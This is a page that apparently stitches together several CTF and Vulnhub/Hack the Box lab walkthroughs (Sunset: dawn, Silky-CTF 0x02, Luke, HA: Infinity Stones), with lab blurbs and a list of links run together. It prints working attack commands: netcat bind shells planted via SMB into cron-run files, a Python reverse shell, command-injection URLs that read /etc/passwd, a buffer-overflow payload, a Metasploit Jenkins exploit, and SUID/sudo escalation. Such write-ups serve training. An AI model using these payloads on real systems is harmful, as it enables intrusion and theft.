Network Scanning

We will be running this lab in a Virtual Machine Player or Virtual Box. After running the lab, we used the netdiscover command to check the IP Address of the lab.

netdiscover

This was found out to be 192.168.1.165.

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.

nmap -A 192.168.1.165

We learned from the scan that we have the port 80 open which is hosting Apache httpd service, and we have the port 139,445,3306 open. This tells us that we have the NetBIOS and MySQL service running on the target machine respectively.

Enumeration

Since we got the port 80 open, we decided to browser the IP Address in the browser. We were given an unavailable error as shown in the given image.

We also started a Directory Bruteforce in order to enumerate the machine further. This gave us a directory called “logs”as shown in the given image.

dirb http://192.168.1.165/

Upon finding the logs directory, we opened the URL in our browser. This gave us a bunch of different log files like auth.log, daemon.log, error.log and management.log. We tried to access the all those log files but we got forbidden message in all except management.log.

So, we downloaded the management.log and used cat command to open the management.log on our attacker machine (Kali Linux). Here we see that we have a directory named “ITDEPT”. It contains two files namely product-control and web-control. As these files were mentioned with cron, we can safely say that these files are getting executed by some background task.

cd Downloads

cat management.log

Back to the nmap port scan, we found that the there is a NetBIOS SMB. Its time to enumerate this machine’s SMB Service. There are multiple ways to do this about which you can learn from here. Here we decided to use the Enum4Linux script. This shows that we have the ITDEPT directory we found earlier. This means this directory is accessible through SMB.

enum4linux -a 192.168.1.165

Also, as we explored the result of Enum4Linux, we saw that we have two users namely, “dawn” and” ganimedes”.

Exploitation

Since, we found the ITDEPT directory in our enumeration. We tried to access it using the SMB as shown in the image. We gave a blank password to login. Upon logging in we ran the ls command. We found nothing in it. We ran the ls command again with the -al parameters to see if we missed any hidden files but we couldn’t find any.

smbclient //192.168.1.165/ITDEPT

ls -al

But this doesn’t mean that we cannot create any file in it. We went back to our terminal and created the files by the name of “product-control” and “web-control”. We created the files by this name because earlier while enumerating the management.log file we saw that files with this name were executed after some time again and again using cron. We also entered the netcat shell invocation script in those files using the echo command as well.

echo “nc -e /bin/bash -lvp 1234 &” > product-control

echo “nc -e /bin/bash -lvp 1234 &” > web-control

Now back to the SMB shell, we transferred the files that we just created to the target system using put command. Both the files were successfully transferred. After the transfer, we ran the ls command to check whether the files were indeed on the system or not. As seen in the image given below, we have put our files on the target system.

put product-control

put web-control

Now, we went back to our browser, to see the log directory. From there we downloaded the management.log file again. We did this as if those files we just created were executed or not. As show in the image, the files were successfully executed by the cron on the target system.

Now we ran the netcat to get this session on the target machine. We get our shell through netcat. This was an improper shell. So, we used the python one-liner to convert this into a proper shell. On conversion we saw that the shell we got was of user dawn.

nc 192.168.1.165 1234

python -c ‘import pty;pty.spawn(“/bin/bash”)’

Privilege Escalation

Now that we had a shell, it was regular practice to check for any file having SUID permissions with the help of Find command. By using the following command, we enumerated all binaries having SUID permissions:

find / -perm -u=s -type f 2>/dev/null

whoami

/usr/bin/zsh

whoami

cd /root

cat flag.txt

The Find command gave us that the zsh command can help us escalate privilege on this machine. We ran the zsh command and checked our status using the whoami command. We got root. Now it was time to enumerate for the flag. We traversed into the root directory and found the flag.txt file. This concludes this CTF.

Wordy is design for beginners to experience real life Penetration testing. This lab is completely dedicated to Web application testing and there are several vulnerabilities that should be exploited in multiple ways. Therefore, it is not only intended as a root challenge boot, the primary agenda is proactive in exploiting tops listed web application vulnerabilities.

As this is a wordpress based lab, it is designed so that users can practice following vulnerabilities:

· LFI

· RFI

· CSRF

· File Upload

· SQL

Download: here

Thanos thinks that if he kills half of all life in the universe, he’ll restore balance. To do so, he needs all six Infinity Stones to power his Infinity Gauntlet, which in turn will give him the ability to bend time, space, energy, and the laws of physics and reality. But the Avengers are one step ahead of Thanos this time. Avengers have hidden all the Infinity Stones all over this CTF. Help Thanos to get all the Infinity Stones and restore the balance of the universe.

This machine contains 6 Infinity Stones with Six different flags to test your skills.

1. Space Stone

2. Mind Stone

3. Reality Stone

4. Time Stone

5. Power Stone

6. Soul Stone

Each stone can be found with a different way.

ENUMERATION IS THE KEY !!!!!

https://drive.google.com/file/d/1kLXbHgdx92YRJLdRnf_EVZWEulA0MYYo/view?usp=sharing

Today we will be solving a boot2root lab from Vulnhub called SILKY-CTF: 0x02. This lab is a good way to keep your penetration testing skills on point while getting some variety.
Download it from HERE
Level: Easy-Intermediate
Task: Boot to Root (flag.txt)

Penetration Methodologies

Scanning

Netdiscover
Nmap

Enumeration

Directory Scanning using DIRB
Giving Credentials For Admin Login

Exploitation

Exploiting Command Injection Vulnerability
Fuzzing to exploit LFI Vulnerability
Reading /etc/passwd file
Getting a reverse connection using Python Reverse Shell
Spawning a TTY Shell

Privilege Escalation

Getting SUID File
Exploiting Buffer Overflow Vulnerability using Bad Chars and Python Script
Decoding Hashes using John

Capturing the flag

Walkthrough

Network Scanning

Let’s start by scanning the network for targets using Netdiscover.
netdiscover

We found target IP Address 192.168.1.23. Let’s begin with basic port scanning with NMAP
nmap -A -sV 192.168.0.23

Enumeration
NMAP scanning result wasn’t much useful to us. So, we thought of executing Directory Brute force in order to enumerate the machine further. This gave us a directory “admin.php”. This seems quite interesting.

.
After browsing the directory on the browser, it turned out to be Admin Login Panel. This might be useful to follow up.

We Clicked on Login and Got a Login form to give Admin’s Username & Password. We tried different methods to access Admin Panel but were shutdown.

We thought of logging in with random credentials.

Noticing the error was in German Language. That’s Different!!

Exploitation
After spending a few time looking for a way. It clearly strikes to check LFI in the URL as shown in the image. We have successfully executed the ls command which means it is vulnerable to command injection.

To confirm the LFI, we did some Fuzzing and found the /etc/passwd file.
192.168.0.23/admin.php?username=%0A/bin/cat/etc/passwd

Moving on, we looked for a Flag.txt in the Silky home directory.
192.168.0.23/admin.php?username=%0A/bin/cat/home/silky/flag.txt

It’s time to execute a Python Reverse Shell to get a reverse connection. But before executing the shell establish a Netcat listener on your machine. Given below is the Python reverse shell we have used in the URL to obtain a reverse connection on our Netcat listener.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.23",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Oh Yeah!! We got the reverse shell on our Netcat listner, but it is not a proper shell. We will spawn this tty shell using python.
nc -lvp 4444

python -c ‘import pty;pty.spawn(“/bin/bash”)’

While enumerating the directories of the machine, we found a SUID file cat_shadow. This might come in handy. Let’s see.

On checking what this file actually does by executing it. We noticed it’s trying to read the shadow file but on the other hand we got a permission denied.
./cat_shadow
./cat_shadow silky

We clearly knew, we need to send that HEX value since it seemed it is vulnerable to Buffer Overflow Vulnerability.
./cat_shadow $(python -c ‘print “A”*100’)

After some trials, we wrote a simple python script to write 64 bad characters of “A” and then adds the value of “0x496c5962” in little-endian format and provide the result as input to the “cat_shadow” file and was able to read the “/etc/shadow” file.
./cat_shadow $(python -c ‘print “A”*64 + “\x62\x59\x6c\x49”’)

Now we have simply copied the hashes in a file on our Kali Linux and Fired UP!! John to decode the hashes. After sometime, we got the password for root. I guess there is only one thing left to do is to read our Final Flag.

We logged in to Root User using the found credentials and easily got our way to the Final Flag.

Hello! Everyone and Welcome to yet another CTF challenge from Hack the Box, called ‘Luke,’ which is available online for those who want to increase their skills in penetration testing and Black box testing. Luke is a retired vulnerable lab presented by Hack the Box for making online penetration testing practice suitable to your experience level; they have a large collection of vulnerable labs as challenges ranging from beginner to expert level.

Level: Easy

Task: Find user.txt and root.txt in the victim’s machine

Penetration Methodologies

Scanning

Nmap

Enumeration

Logging in FTP as anonymous

Browsing HTTP service

Directory Scanning using Dirsearch

Exploitation

Extracting Authentication token using curl

Extracting User information using curl

Extracting Password using curl

Privilege Escalation

Logging in Ajenti Panel

Capturing the flag

Walkthrough

Network Scanning

Let’s get started then!

Since these labs have a static IP, the IP address for Luke is 10.10.10.137. Let us scan the VM with the most popular port scanning tool, nmap.

nmap -A 10.10.10.137

From the result above we found five working ports on the VM, port 21, 22, 80, 3000, 8000.

Here, we can saw that FTP allow anonymous login. So, we check it.

ftp 10.10.10.137

ftp> ls

ftp> cd webapp

ftp> ls

ftp> get for_Chihiro.txt

Through FTP login we found a for_Chihiro.txt file, where Chihiro or Derry might be usernames.

cat for_Chihiro.txt

We found that the HTTP service runs on port 80, from nmap results. So, we browse the IP address of Target in the browser. We found a simple HTML page.

We also started a Directory Bruteforce in order to enumerate the machine further. This gave us some directories and files namely config.php, management etc.

./dirsearch.py -u http://10.10.10.137 -e php -x 400, 403, 404

We enumerated all of them. Among which config.php gave us some database credentials as shown in the image below.

We tried credentials on 10.10.10.137/management. But it gave back an unauthorized error. We will come back to it again.

Back to our nmap scan, we found that a Nodejs service running on port 3000. On browsing the IP Address with 3000 port, we got a message that says that auth token is not supplied.

We further did a Directory Bruteforce on port 3000. We found pages named /login and /users.

./dirsearch.py -u http://10.10.10.137:3000 -e php -x 400, 403, 404

After a bit of research, we can use curl command to authenticate JWT token. For more you can read this article from here.

The trick part here is the username is admin and not root which we guessed.

So, the curl command with the admin as username and password we got earlier.

curl --header "Content-Type: application/json" --request POST --data '{"username":"admin", "password":"Zk6heYCyv6ZE9Xcg"}' http://10.10.10.137:3000/login

This gave us the auth token.

We enumerated usernames using the curl command with the help of the Authentication token we found earlier. This gave use users information as shown in the image given below.

curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9.h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310' http://10.10.10.137:3000/users

We enumerated all users using the curl command. This gave use password for those users as shown in the image given below.

We logged in the management page successfully using the credentials of user Derry.

User Name: Derry

Password rZ86wwLvx7jUxtch

After logging in we found a files named config.json, config.php and login.php. We enumerated all these files among which config.json seemed intresting.

The config.json file had some information related to ‘ajenti’ service running on port 8000 and a password.

We browsed the IP Address with the port 8000, It gave us another login form. We used the following credentials into the form. This successfully gave us the ajenti panel as shown in the image given below:

Username: root

Password: KpMasng655EtTy9Z

After Enumerating a bit, we saw the option to open terminal. On opening the terminal, we checked the user and group details using id command. It is root shell. Here we enumerated the shell for user and root flags.

Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles. Contact here.

Today we are going to solve our CTF challenge called “HA: Infinity Stones” We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it

Level: Intermediate

Task: Find 6 Flags on the victim’s machine.

Penetration Methodology

Scanning

Netdiscover

Nmap

Enumeration

Directory Scanning using DIRB

Exploitation

Privilege Escalation

Getting SUID File

Capturing the flag

Walkthrough

First of all we try to identify our target and for this use the following command:

netdiscover

Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:

nmap -A 192.168.0.4

With the help of help scan, we now know that port number 22, 80, 443, 8080 are open with the service of SSH, HTTP, HTTPS, HTTPrespectively. Now that port 80 is open we open the target IP address in our browser as shown in the following image :

It opened a webpage as shown in the above image. But as resulted in the nmap scanning port 8080 is also open, so now we opened our target IP with port 8080 and found a log in page there as shown in the image below :

Now that we do not have log in credentials, we explored using dirb in order to find directories, and in the result of dirb, we found two important directories i.e. /img and /wifi as shown in the image below :

First of them, we opened, /img directory and there was a space.jpg we found there.

When opened this image was of tesseract. Nothing else in the image as you can see in the image below :

But if you remember, space stone was inside the tesseract, so we used exif tool to see if there was metadata stored in the image. And for this use the following command :

exiftool space.jpg

And so, as you can see in the image below, our doubt was correct, because here we found our first flag i.e. spacestone. Now our infinity gauntlet is missing five more stones (flags). Let’s try and find them.

Our target also has port 443 open, which means there is a webpage on https, lets try and open it. When you open the target IP on port 443, it shows something is not right with the SSL certificate which you can in the image below too :

Click on that lock icon and navigate yourself to its security as shown in the image below, as here you will find your second stone i.e. Mind stone. Four more stones to collect for there to be perfect balance.

If you remember, with the /img directory we also found /wifi directory. So now let’s traverse through that.

Upon opening the said directory, we found two things i.e. pwd.txt and reality.cap. First, we downloaded pwd.txt to see what it had to offer. Use the following command to download it :

wget http://192.168.0.4/wifi/pwd.txt

Once downloaded, we read the pwd.txt file using the cat command. And it said “Your Password is thanos daughter name “gam” (note it’s all lower case) plus the following I enforced new requirement on you…12 characters

One uppercase character

Two numbers

Two lowercase

The year of the first avengers movie came out in theaters”

Now that we know password the format of password so we will use crunch to make a wordlist for all the possible password combinations with the following command :

crunch 12 12 -t gam,%%@@2012 -o dict.txt

Now, the other file which we found was reality.cap so while examining that file, we found wifi packets in it. So, we used aircrack-ng and used our crunch created password list to find the wifi key. And voila! We found our wifi key as shown in the image below :

We used this wifi key as a directory and we found a realitystone.txt which further lead us to our reality stone. Three stones down, three more to go.

Now, for the next stone, we opened the target IP on the 443 port; it had a redirecting link on the top right side. Upon clicking on the link, we are redirected to a page where there is quiz about avengers, and also some hint related to binary. As shown in the image below :

Upon solving the quiz, we had got following answers with their corresponding binary value :

S.No.	Questions	Answers	Binary Value
1.	In the beginning, there are 3 infinity stones on earth.	False	0
2.	At the end, there are two survivors on Titan.	True	1
3.	Thanos already had the power stone when he first appeared.	True	1
4.	Tesseract contains the reality stone.	False	0
5.	The dwarf on Ndavellir is played by Peter Dinklage	True	1
6.	Red skull is the guardian of space stone.	False	0
7.	Thor’s new hammer is called stormbuster.	False	0
8.	Rocket is the only Gaurdian of the Glaxy to survive the snap.	True	1

After solving the quiz and identifying their binary values, we had a binary string i.e. 01101001. We opened this string of binary characters through the URL and there was a hints.txt and further opened it and found text encrypted through brainfuck algorithm.

So further, we decrypted the cipher text and got its value as admin:avengers. Here, huge possibility is that this can be log in credentials which can be used on the log in page that we found on 8080.

As deduced above, we logged in by using the above founded credentials and were welcomed with the following page :

The webpage has used Jenkins framework and it is commonly known for its vulnerability as in Metasploit there is an affective exploit for it. Therefore, we will use the following exploit and so, open Metasploit in kali and the following set of commands :

use exploit /multi/http/jenkins_script_console

set target 1

set rhosts 192.168.0.4

set username admin

set password avengers

set targeturi /

exploit

Once the exploit is executed, you will have a meterpreter session. And when you try to have shell by using the simple “shell” command but an improper shell session will be opened. To get a proper shell use the following command :

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

Now that we have proper shell, we tried to look for the files which had SUID bits set on them and for that we used the following command :

find / -perm -u=s -type f 2>/dev/null

After running the above command, we had a list and we enumerated through them one by one. Although the one that stood out was /opt/script. And the one that had our next stone i.e. time stone was /opt/script only as shown in the following image :

As we found our fourth stone in the /opt/script we decided to explore /opt a bit more. And for that we used following set of commands :

cd /opt

The above commands allowed us to see the contents of /opt and there we found morag.kdbx. now this morag.kdbx is important for two reasons i.e. there was a planet named morag in avengers series and .kdbx tells us that it might have password key database.

So we decided to open and we met with the following dialogue box :

As we didn’t knew the ‘master password’, we decided to run a python script which created the key hash and then with the additional help of john the ripper we cracked the password and to do so, type :

python keepass.py morag.kdbx > hash

john hash

And as you can see in the image above, the master password is princesa. When entered this password, we found one enter on the flag tab which is powerstone. And so we found our fifth and second last stone/flag as shown in the image below :

Another tab, just below flags, is cred in the morag.kdbx password key database. When opened, it contained a base64 string as shown in the image below :

So we decoded the string using the following echo command :

echo “bW9yYWc6eW9uZHU=” | base64 -d

The string was then decoded to plain text i.e. morag:yondu, just like in the image below :

We have found five stones till now using each port except SSH. And the above decoded string can be our log in credentials to log in through SSH. Therefore, we tried it using the following command :

ssh morag@192.168.0.4

And then, when further asked for password type ‘yondu’ and so you are logged in just as shown in the image below :

After loggin in through SSH, we used ‘sudo -l’command to see which user had no password and the result was : /usr/bin/ftp. So we switched the user to ftp and further accessed root to find our final flag by using the following set of commands :

sudo ftp

!/bin/bash

cd/root

cat final.txt

And so, we have found all the six stones aka flags and with just a snap there can be perfect balance in the universe.

Broken: Gallery Vulnhub Walkthrough

Hands-on Red Team Tactics - A Red Team Edition book

Comprehensive Guide on fcrackzip Tool

CTF KFIOFan: 2 Vulnhub Walkthorugh

Nezuko: 1 Vulnhub Walkthrough

GrimTheRipper: 1 Vulnhub Walkthrough

AI: Web: 1 Vulnhub Walkthrough

Westwild: 2 Vulnhub Walkthrough

Symfonos:4 Vulnhub Walkthrough

Penetrating Methodology:

Walkthrough

Network Scanning

Enumeration

Privilege Escalation:

Serial: 1 Vulnhub Walkthrough

Sunset: Nightfall Vulnhub Walkthrough

Dc:7 Vulnhub Walkthrough

AI: Web: 2 Vulnhub Walkthrough

Prime: 1 Vulnhub Walkthrough

Sunset: dawn Vulnhub Walkthrough

Wordy: CTF Challenge

HA:Infinity Stones CTF Challneges

Silky-CTF: 0x02 Vulhub Walkthrough

Walkthrough

Network Scanning

Hack the Box Luke Walkthrough

HA: Infinity Stones Walkthrough